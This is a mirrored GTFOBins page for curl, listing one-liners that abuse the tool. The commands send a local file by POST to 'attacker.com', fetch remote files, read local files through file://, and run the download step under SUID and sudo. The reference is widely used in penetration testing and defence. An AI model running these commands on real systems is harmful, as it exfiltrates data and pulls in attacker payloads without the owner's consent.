This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-19 05:51:36 +01:00
Code
Issues
f8dab26569
GTFOBins.github.io
/
_gtfobins
/
curl.md
Andrea Cardaci
689e00461d
Get rid of base64 for curl and wget and make descriptions similar
...
Close
#24
.
2018-09-25 19:56:27 +02:00
1.1 KiB
Raw
Blame
History
functions
upload
download
file-read
suid-enabled
sudo-enabled
description
code
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data.
URL=
http://attacker.com/
LFILE=file_to_send curl -X POST -d @$file_to_send $URL
description
code
Fetch a remote file via HTTP GET request.
URL=
http://attacker.com/file_to_get
LFILE=file_to_save curl $URL -o $LFILE
description
code
The file path must be absolute.
LFILE=/tmp/file_to_read curl file://$LFILE
description
code
Fetch a remote file via HTTP GET request.
URL=
http://attacker.com/file_to_get
LFILE=file_to_save ./curl $URL -o $LFILE
description
code
Fetch a remote file via HTTP GET request.
URL=
http://attacker.com/file_to_get
LFILE=file_to_save sudo -E curl $URL -o $LFILE